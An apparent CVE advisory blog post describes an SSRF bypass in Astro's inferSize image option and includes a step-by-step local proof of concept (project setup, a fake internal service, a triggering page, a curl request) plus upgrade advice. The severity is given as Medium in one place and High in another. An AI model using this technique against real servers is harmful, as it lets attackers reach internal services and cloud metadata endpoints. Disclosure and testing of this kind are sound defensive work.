Astro SSRF Vulnerability, CVE-2026-27829 (Medium)

Listen to this Post

A bug in Astro’s image pipeline, affecting versions 9.0.0 through 9.5.3, allows attackers to bypass `image.domains` and `image.remotePatterns` restrictions. This vulnerability resides in the `inferSize` option, which fetches remote images at render time to determine their dimensions. When this option is used, the framework fails to perform domain validation, fetching images from any host regardless of configured allowlists. An attacker who can influence image URLs (e.g., via CMS content or user-supplied data) can exploit this to make the server fetch content from unauthorized hosts. This leads to Server-Side Request Forgery (SSRF), enabling requests to internal network services and cloud metadata endpoints. The issue is fixed in version 9.5.4 .

dailycve form:

Platform: Astro Web Framework
Version: 9.0.0-9.5.3
Vulnerability: SSRF Bypass
Severity: Medium (6.5)
date: 02/25/2026

Prediction: March 2026 Patch

What Undercode Say:

Showing bash commands and codes related to the blog

Setup for Proof of Concept
Create a new Astro project with the vulnerable configuration
1. Create project directory and initialize
mkdir poc-ssrf-infersize
cd poc-ssrf-infersize
npm init -y
2. Install vulnerable versions
npm install [email protected] @astrojs/[email protected]
3. Create astro.config.mjs with allowlist for localhost:9000 only
File: astro.config.mjs
cat > astro.config.mjs << 'EOF'
import { defineConfig } from 'astro/config';
import node from '@astrojs/node';
export default defineConfig({
output: 'server',
adapter: node({ mode: 'standalone' }),
image: {
remotePatterns: [
{ hostname: 'localhost', port: '9000' }
]
}
});
EOF
4. Create a simulated internal service (non-allowlisted)
File: internal-service.mjs
cat > internal-service.mjs << 'EOF'
import { createServer } from 'node:http';
const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64');
createServer((req, res) => {
console.log(<code>[bash] Received: ${req.method} ${req.url}</code>);
res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length });
res.end(GIF);
}).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888'));
EOF
5. Create a page that triggers the vulnerability
File: src/pages/test.astro
mkdir -p src/pages
cat > src/pages/test.astro << 'EOF'
import { getImage } from 'astro:assets';
const result = await getImage({
src: 'http://127.0.0.1:8888/internal-api',
inferSize: true
});
<html>
<body>
Width: {result.options.width}, Height: {result.options.height}
</body>
</html>
EOF
6. Run the internal service
node internal-service.mjs &
7. Start the Astro dev server
npm run dev

Exploit:

Trigger the SSRF by requesting the page
curl http://localhost:4322/test
The internal service logs will show:
[bash] Received: GET /internal-api
This confirms the server fetched from a non-allowlisted host (127.0.0.1:8888)

Protection from this CVE

Upgrade to Astro version 9.5.4 or later. As an immediate workaround, avoid using the `inferSize` option with user-supplied image URLs. Validate and sanitize all image URL inputs, and implement network-level controls to restrict outbound traffic from the server .

Impact

High. Successful exploitation allows Server-Side Request Forgery (SSRF), enabling attackers to bypass security controls and interact with internal network services and cloud metadata endpoints. This can lead to information disclosure, internal network scanning, and potential further compromise of internal systems .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top